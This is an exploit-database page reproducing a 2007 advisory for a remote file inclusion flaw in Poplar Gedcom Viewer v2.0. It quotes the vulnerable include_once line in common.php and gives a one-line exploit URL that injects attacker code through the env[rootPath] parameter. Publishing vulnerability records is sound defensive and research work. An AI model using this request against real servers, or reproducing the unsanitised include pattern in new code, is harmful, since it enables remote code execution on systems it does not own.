header-logo
Suggest Exploit
vendor:
Poplar Gedcom Viewer
by:
GolD_M = Mahmood_ali
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Poplar Gedcom Viewer
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Poplar Gedcom Viewer v2.0 final

The vulnerability exists in the 'common.php' file of Poplar Gedcom Viewer v2.0. By manipulating the 'env[rootPath]' parameter, an attacker can execute arbitrary code on the server.

Mitigation:

Update to a patched version of the software or apply necessary security measures to prevent unauthorized access.
Source

Exploit-DB raw data:

/###################################################################\
# Poplar Gedcom Viewer v2.0 final                                   #
# =========================================================         #
# Published : 2007-01-00                                            #
# Remote: Yes                                                       #
# Site:ftp://ftp1.comscripts.com/PHP/689_poplarge-20.zip            #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.Cn                                             #
# =====================================================             #
# ThanX =All My Friends& ABDULLAH00& THE GENERAL & Asb-May.Net      #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                   #
\###################################################################/
# In :                                                              #
# /include/common.php                                               #
# Line:                                                             #
# 51                                                                #
# Vulnerable Code:                                                  #
# include_once( $env['rootPath'].'/include/adodb/adodb.inc.php' )   #
# 3XP|0!T :                                                         #
# /include/common.php?env[rootPath]=[EV!L-CODE]                     #
#                                                                   #
#             /#######################################\             #
#             #         Tryag.Com & Dwrat.Com         #             #
#             \#######################################/             #
\###################################################################/

# milw0rm.com [2007-01-12]

Navigation

Suggest Exploit

Services By CQR